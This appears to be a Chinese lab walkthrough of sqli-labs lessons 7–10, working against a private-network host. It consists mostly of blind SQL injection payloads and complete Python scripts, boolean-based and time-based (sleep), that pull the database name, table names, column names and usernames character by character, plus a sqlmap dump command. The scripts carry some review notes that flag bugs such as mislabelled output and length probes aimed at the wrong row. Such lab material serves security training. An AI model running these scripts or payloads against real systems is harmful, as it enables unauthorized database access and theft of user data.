7.
输入?id=1' --+显示格式错误
?id=1" --+正常 测试 ?id=1" and sleep(5) --+ 发现并没有成功
?id=1') --+显示格式错误继续尝试
?id=1')) --+ 显示正常 测试 ?id=1“ and sleep(5) --+ 发现sleep执行
对于语句闭合的尝试主要从 ' " ()来测试
尝试报错注入语句，发现不回显具体的报错信息，只会出现语法错误的提示
发现存在布尔注入
布尔注入即可以根据返回页面判断条件真假的注入
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
?id=1')) and (length(database())>7) --+ 页面正常
?id=1')) and (length(database())>8) --+ 页面报错
通过length知道了数据库长度为8
?id=1')) and (substr(database(),1,1)='s') --+
这里写一个布尔盲注脚本
使用这个脚本判读长度
import requests
def getLength() -> None:
    """Probe the length of the current database name (boolean-based blind, Less-7).

    Sends ``LENGTH(database()) > n`` for n = 1..64, one GET request each, and
    prints the first n for which the page shows the error text ``'You have an'``.
    That is the first n for which the comparison is false, i.e. the length itself.
    The result is only printed, not returned; if no probe triggers the error
    text (length above 64, or a different page response) nothing is printed.

    From the server side every probe is a request to ``/Less-7/?id=1')) AND (...``;
    the injection exists because ``id`` is concatenated into the query, which a
    parameterized query removes entirely.
    """
    for length in range(1, 65):
        # "1'))" closes the lab's quoting; "-- -" comments out the rest of the statement.
        payload = f"1')) AND (LENGTH(database())>{length}) -- -"
        url = f'http://192.168.1.200:86/Less-7/?id={payload}'
        rsp = requests.get(url)
        if 'You have an' in rsp.text:
            print('长度:', length)
            break
# Module-level call: the probe runs as soon as the script is executed.
getLength()
def databasename() -> str:
    """Recover the current database name one character at a time (boolean-based blind).

    For each position every candidate in ``charset`` is sent as its own GET
    request; a response containing ``'You are in'`` is treated as "true".
    The outer loop ends at the first position where no candidate matched, so a
    character outside ``charset`` (for example ``_``) truncates the result there.
    Returns the prefix recovered so far.
    """
    database_name = ""
    # Only ASCII letters and digits are tried: 62 candidates, so up to 62 requests per position.
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # Compares the ASCII code of the character at the next position with the candidate's code point.
            payload = f"1')) AND (ASCII(SUBSTR(database(), {len(database_name) + 1}, 1))={ord(char)}) --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                database_name += char
                print('数据库名:', database_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return database_name
# Module-level: recover the name, then print the final value.
database_name = databasename()
print("最终数据库名:", database_name)
?id=1')) and (substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e') --+
通过这个语句我们可以查询表名
脚本
def tablename() -> str:
    """Recover the first table name of the ``security`` schema character by character.

    Same boolean-based loop as the database-name probe: each candidate character
    is one GET request and ``'You are in'`` in the response means "true".
    ``LIMIT 0,1`` selects the first row of ``information_schema.tables``.
    Stops at the first position with no match and returns the prefix found.
    """
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1')) AND (substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),{len(table_name) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                table_name += char
                # NOTE: the label says "database name" but the value printed is the table name.
                print('数据库名:', table_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return table_name
# Module-level: recover the table name, then print it.
# NOTE: the label says "database name" but the value is the table name.
table_name = tablename()
print("最终数据库名:", table_name)
查字段
?id=1')) and (substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1),1,1) = 'u' ) --+
def Data() -> str:
    """Recover the first ``username`` of ``security.users`` character by character.

    Boolean-based blind loop: one GET request per candidate character,
    ``'You are in'`` in the response means the guess was right.
    ``LIMIT 0,1`` selects the first row. Stops at the first position with no
    match and returns the prefix found.
    """
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1')) AND (substr((select username from security.users limit 0,1),{len(data) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                data += char
                print('数据:', data)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return data
# Module-level: recover the value, then print it.
data = Data()
print("最终数据:", data)
总脚本
import requests
def getLength1() -> None:
    """Probe the length of the current database name (boolean-based blind, Less-7).

    Sends ``LENGTH(database()) > n`` for n = 1..64 and prints the first n whose
    response carries the error text ``'You have an'`` — the first false
    comparison, i.e. the length itself. Prints only; nothing is printed if no
    probe produces the error text.
    """
    for length in range(1, 65):
        payload = f"1')) AND (LENGTH(database())>{length}) -- -"
        url = f'http://192.168.1.200:86/Less-7/?id={payload}'
        rsp = requests.get(url)
        if 'You have an' in rsp.text:
            print('长度:', length)
            break
# Module-level call: runs the length probe when the script starts.
getLength1()
def databasename() -> str:
    """Recover the current database name character by character (boolean-based blind).

    One GET request per candidate character; ``'You are in'`` in the response
    means the guess was right. Ends at the first position where no candidate
    in ``charset`` matched and returns the prefix recovered so far.
    """
    database_name = ""
    # ASCII letters and digits only: 62 candidates per position.
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # ASCII code of the next character compared with the candidate's code point.
            payload = f"1')) AND (ASCII(SUBSTR(database(), {len(database_name) + 1}, 1))={ord(char)}) --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                database_name += char
                print('数据库名:', database_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return database_name
# Module-level: recover the database name, then print it.
database_name = databasename()
print("最终数据库名:", database_name)
def getTableLength() -> None:
    """Probe the length of a table name in the ``security`` schema.

    Same ``> n`` scan as the database-length probe; the first n that yields the
    error text ``'You have an'`` is printed as the length.

    NOTE(review): ``SUBSTR(..., 1)`` takes the whole string, so it does not
    change the measured length. This probe reads the first table (``LIMIT 0,1``)
    while the ``tablename`` loop that follows reads the second (``LIMIT 1,1``),
    so the printed length does not belong to the name recovered next.
    """
    for length in range(1, 65):
        payload = f"1')) AND (LENGTH(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1)) > {length}) --+"
        url = f'http://192.168.1.200:86/Less-7/?id={payload}'
        rsp = requests.get(url)
        if 'You have an' in rsp.text:
            print('表名长度:', length)
            break
# Module-level call: runs the table-name length probe.
getTableLength()
def tablename() -> str:
    """Recover the second table name of the ``security`` schema (``LIMIT 1,1``).

    Boolean-based blind loop: one GET request per candidate character and
    ``'You are in'`` in the response means "true". Stops at the first position
    with no match and returns the prefix found; characters outside ``charset``
    (e.g. ``_``) cannot be recovered and end the loop.
    """
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1')) AND (substr((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),{len(table_name) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                table_name += char
                print('表名:', table_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return table_name
# Module-level: recover the table name, then print it.
table_name = tablename()
print("最终表名:", table_name)
def columnname() -> str:
    """Recover the second column name of ``security.users`` (``LIMIT 1,1``).

    Boolean-based blind loop over ``information_schema.columns``: one GET
    request per candidate character, ``'You are in'`` in the response means
    "true". Stops at the first position with no match and returns the prefix.
    """
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1')) AND (substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1),{len(column_name) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                column_name += char
                print('列名:', column_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return column_name
# Module-level: recover the column name, then print it.
column_name = columnname()
print("最终列名:", column_name)
def Data() -> str:
    """Recover the first ``username`` of ``security.users`` (``LIMIT 0,1``).

    Boolean-based blind loop: one GET request per candidate character and
    ``'You are in'`` in the response means the guess was right. Stops at the
    first position with no match and returns the prefix found.
    """
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1')) AND (substr((select username from security.users limit 0,1),{len(data) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-7/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                data += char
                print('数据:', data)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return data
# Module-level: recover the value, then print it.
data = Data()
print("最终数据:", data)
sqlmap
└─# sqlmap -u "http://192.168.1.200:86/Less-7/?id=1" --batch -D security -t users --dump
8.
?id=1' --+正常
sleep正常执行；与上面相比，输入错误时不会出现提示，但仍然是布尔型注入
def databasename() -> str:
    """Recover the current database name character by character (Less-8, boolean-based blind).

    Differs from the Less-7 version only in the quoting — ``1'`` closes a
    single-quoted value — and in comparing the character directly instead of
    its ASCII code. One GET request per candidate; ``'You are in'`` in the
    response means "true". Stops at the first position with no match and
    returns the prefix found.
    """
    database_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' AND (SUBSTR(database(), {len(database_name) + 1}, 1)='{char}') --+ "
            url = f'http://192.168.1.200:86/Less-8/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                database_name += char
                print('数据库名:', database_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return database_name
# Module-level: recover the database name (printed progressively inside the function).
database_name = databasename()
脚本就改个url地址和闭合方式
import requests
def getLength1() -> None:
    """Probe the length of the current database name (Less-8, boolean-based blind).

    Sends ``LENGTH(database()) > n`` for n = 1..64 and prints the first n whose
    response carries the error text ``'You have an'`` — the first false
    comparison, i.e. the length itself. Prints only; nothing is printed if no
    probe produces the error text.
    """
    for length in range(1, 65):
        payload = f"1' AND (LENGTH(database())>{length}) -- -"
        url = f'http://192.168.1.200:86/Less-8/?id={payload}'
        rsp = requests.get(url)
        if 'You have an' in rsp.text:
            print('长度:', length)
            break
# Module-level call: runs the length probe when the script starts.
getLength1()
def databasename() -> str:
    """Recover the current database name character by character (Less-8, boolean-based blind).

    One GET request per candidate character; ``'You are in'`` in the response
    means "true". Ends at the first position where no candidate in ``charset``
    matched and returns the prefix recovered so far.
    """
    database_name = ""
    # ASCII letters and digits only: 62 candidates per position.
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' AND (SUBSTR(database(), {len(database_name) + 1}, 1)='{char}') --+ "
            url = f'http://192.168.1.200:86/Less-8/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                database_name += char
                print('数据库名:', database_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return database_name
# Module-level: recover the database name, then print it.
database_name = databasename()
print("最终数据库名:", database_name)
def getTableLength() -> None:
    """Probe the length of a table name in the ``security`` schema (Less-8).

    Same ``> n`` scan as the database-length probe; the first n that yields the
    error text ``'You have an'`` is printed as the length.

    NOTE(review): ``SUBSTR(..., 1)`` returns the whole string and does not
    affect the result. This reads the first table (``LIMIT 0,1``) whereas the
    ``tablename`` loop that follows reads the second (``LIMIT 1,1``), so the
    printed length is not the length of the name recovered next.
    """
    for length in range(1, 65):
        payload = f"1' AND (LENGTH(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1)) > {length}) --+"
        url = f'http://192.168.1.200:86/Less-8/?id={payload}'
        rsp = requests.get(url)
        if 'You have an' in rsp.text:
            print('表名长度:', length)
            break
# Module-level call: runs the table-name length probe.
getTableLength()
def tablename() -> str:
    """Recover the second table name of the ``security`` schema (Less-8, ``LIMIT 1,1``).

    Boolean-based blind loop: one GET request per candidate character and
    ``'You are in'`` in the response means "true". Stops at the first position
    with no match and returns the prefix found.
    """
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' AND (substr((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),{len(table_name) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-8/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                table_name += char
                print('数据表名:', table_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return table_name
# Module-level: recover the table name, then print it.
table_name = tablename()
print("最终表名:", table_name)
def columnname() -> str:
    """Recover the second column name of ``security.users`` (Less-8, ``LIMIT 1,1``).

    Boolean-based blind loop over ``information_schema.columns``: one GET
    request per candidate character, ``'You are in'`` in the response means
    "true". Stops at the first position with no match and returns the prefix.
    """
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' AND (substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1),{len(column_name) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-8/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                column_name += char
                print('数据列名:', column_name)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return column_name
# Module-level: recover the column name, then print it.
column_name = columnname()
print("最终列名:", column_name)
def Data() -> str:
    """Recover the first ``username`` of ``security.users`` (Less-8, ``LIMIT 0,1``).

    Boolean-based blind loop: one GET request per candidate character and
    ``'You are in'`` in the response means the guess was right. Stops at the
    first position with no match and returns the prefix found.
    """
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' AND (substr((select username from security.users limit 0,1),{len(data) + 1},1) = '{char}') --+ "
            url = f'http://192.168.1.200:86/Less-8/?id={payload}'
            rsp = requests.get(url)
            if 'You are in' in rsp.text:
                data += char
                print('数据:', data)
                break
        else:
            break  # no candidate matched at this position: exit the loop
    return data
# Module-level: recover the value, then print it.
data = Data()
print("最终数据:", data)
9.
可以看到不管输入了什么内容返回的都是一句话,布尔注入就用不了了,尝试sleep注入
发现sleep可以执行
通过 if() 三元判断语句：当 substr(database(),1,1)='s' 为 true 时执行 sleep，反之返回 0
通过对值为a和s页面不同的响应速度我们得到第一个为s
import requests,time
def database() -> str:
    """Recover the current database name character by character using a time delay (Less-9).

    The page content no longer differs between true and false, so the verdict
    comes from timing: the injected ``if(...)`` calls ``sleep(2)`` when the
    guessed character is right and returns 0 otherwise, and a round trip of
    2 s or more is taken as a match. One GET request per candidate character;
    stops at the first position where no candidate produced a delay and
    returns the prefix found.

    On the server side this shows up as a burst of requests to the same URL
    with ``sleep(`` in the ``id`` parameter, with a few of them taking ~2 s —
    the usual log signature of time-based probing.
    """
    database_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr(database(),{len(database_name) + 1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            # Wall-clock round trip measured around the request.
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # NOTE(review): the threshold equals the sleep length, so a response that is slow
            # for any other reason (>= 2 s) would also be accepted as a match.
            if rsp_time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break  # no candidate produced the delay: stop
    return database_name
# Module-level: recover the database name, then print it.
datas = database()
print("最终数据库名称为:",datas)
同理，测试表名的语句
?id=1' and if(substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a',sleep(5),0) --+
?id=1' and if(substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e',sleep(5),0) --+
def tablename() -> str:
    """Recover the fourth table name of the ``security`` schema by timing (Less-9, ``LIMIT 3,1``).

    Time-based blind loop: the injected ``if(...)`` sleeps 2 s on a correct
    guess, and a round trip of 2 s or more counts as a match. One GET request
    per candidate character; stops at the first position with no delayed
    response and returns the prefix found.
    """
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # NOTE(review): the trailing ")" comes after the "--+" comment marker and so is
            # presumably ignored by the database as part of the comment — looks like a stray character.
            payload = f"1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else:
            break  # no candidate produced the delay: stop
    return table_name
# Module-level: recover the table name, then print it.
# (The variable name is misspelled but used consistently on both lines.)
tbales = tablename()
print("最终表名称为:",tbales)
爆破列的语句
?id=1' and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 0,1),1,1)='a',sleep(5),0)--+
?id=1' and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 0,1),1,1)='i',sleep(5),0)--+
def columnname() -> str:
    """Recover the third column name of ``security.users`` by timing (Less-9, ``LIMIT 2,1``).

    Time-based blind loop over ``information_schema.columns``: the injected
    ``if(...)`` sleeps 2 s on a correct guess and a round trip of 2 s or more
    counts as a match. One GET request per candidate character; stops at the
    first position with no delayed response and returns the prefix found.
    """
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # NOTE(review): trailing ")" sits after the "--+" comment marker — presumably ignored, looks stray.
            payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break  # no candidate produced the delay: stop
    return column_name
# Module-level: recover the column name, then print it.
columns = columnname()
print("最终列名称为:",columns)
爆破数据
?id=1' and if(substr((select username from security.users limit 0,1),1,1)='a',sleep(5),0) --+
?id=1' and if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0) --+
def data() -> str:
    """Recover the first ``username`` of ``security.users`` by timing (Less-9, ``LIMIT 0,1``).

    Time-based blind loop: the injected ``if(...)`` sleeps 2 s on a correct
    guess and a round trip of 2 s or more counts as a match. One GET request
    per candidate character; stops at the first position with no delayed
    response and returns the prefix found. The local ``data`` shadows the
    function name inside the body.
    """
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break  # no candidate produced the delay: stop
    return data
# Module-level: recover the value, then print it.
datas = data()
print("最终数据为:",datas)
总脚本
import requests,time
def database() -> str:
    """Recover the current database name character by character using a time delay (Less-9).

    The injected ``if(...)`` calls ``sleep(2)`` when the guessed character is
    right and returns 0 otherwise; a round trip of 2 s or more is taken as a
    match. One GET request per candidate character; stops at the first
    position where no candidate produced a delay and returns the prefix found.
    """
    database_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr(database(),{len(database_name) + 1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            # Wall-clock round trip measured around the request.
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # NOTE(review): threshold equals the sleep length, so a response that is slow for
            # any other reason (>= 2 s) would also be accepted as a match.
            if rsp_time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break  # no candidate produced the delay: stop
    return database_name
# Module-level: recover the database name, then print it.
datas = database()
print("最终数据库名称为:",datas)
def tablename() -> str:
    """Recover the fourth table name of the ``security`` schema by timing (Less-9, ``LIMIT 3,1``).

    Time-based blind loop: the injected ``if(...)`` sleeps 2 s on a correct
    guess, and a round trip of 2 s or more counts as a match. One GET request
    per candidate character; stops at the first position with no delayed
    response and returns the prefix found.
    """
    table_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # NOTE(review): trailing ")" sits after the "--+" comment marker — presumably ignored, looks stray.
            payload = f"1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else:
            break  # no candidate produced the delay: stop
    return table_name
# Module-level: recover the table name, then print it.
# (The variable name is misspelled but used consistently on both lines.)
tbales = tablename()
print("最终表名称为:",tbales)
def columnname() -> str:
    """Recover the third column name of ``security.users`` by timing (Less-9, ``LIMIT 2,1``).

    Time-based blind loop over ``information_schema.columns``: the injected
    ``if(...)`` sleeps 2 s on a correct guess and a round trip of 2 s or more
    counts as a match. One GET request per candidate character; stops at the
    first position with no delayed response and returns the prefix found.
    """
    column_name = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            # NOTE(review): trailing ")" sits after the "--+" comment marker — presumably ignored, looks stray.
            payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break  # no candidate produced the delay: stop
    return column_name
# Module-level: recover the column name, then print it.
columns = columnname()
print("最终列名称为:",columns)
def data() -> str:
    """Recover the first ``username`` of ``security.users`` by timing (Less-9, ``LIMIT 0,1``).

    Time-based blind loop: the injected ``if(...)`` sleeps 2 s on a correct
    guess and a round trip of 2 s or more counts as a match. One GET request
    per candidate character; stops at the first position with no delayed
    response and returns the prefix found. The local ``data`` shadows the
    function name inside the body.
    """
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f"1' and if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f"http://192.168.1.200:86/Less-9/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break  # no candidate produced the delay: stop
    return data
# Module-level: recover the value, then print it.
datas = data()
print("最终数据为:",datas)
10.
闭合方式不同
/?id=1"and sleep(5) --+
def data() -> str:
    """Recover the first ``username`` of ``security.users`` by timing (Less-10, ``LIMIT 0,1``).

    Same time-based loop as Less-9; the only difference is the quoting —
    ``1"`` closes a double-quoted value, and the candidate character is
    compared inside double quotes too. The injected ``if(...)`` sleeps 2 s on
    a correct guess and a round trip of 2 s or more counts as a match. Stops
    at the first position with no delayed response and returns the prefix.
    Relies on ``requests`` and ``time`` being imported earlier in the file.
    """
    data = ""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    while True:
        for char in charset:
            payload = f'1" and if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0) --+'
            url = f"http://192.168.1.200:86/Less-10/?id={payload}"
            start_time = time.time()
            rsp =requests.get(url)
            end_time = time.time()
            rsp_time = end_time - start_time
            # Threshold equals the sleep length; any other >= 2 s response would be misread as a match.
            if rsp_time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break  # no candidate produced the delay: stop
    return data
# Module-level: recover the value, then print it.
datas = data()
print("最终数据为:",datas)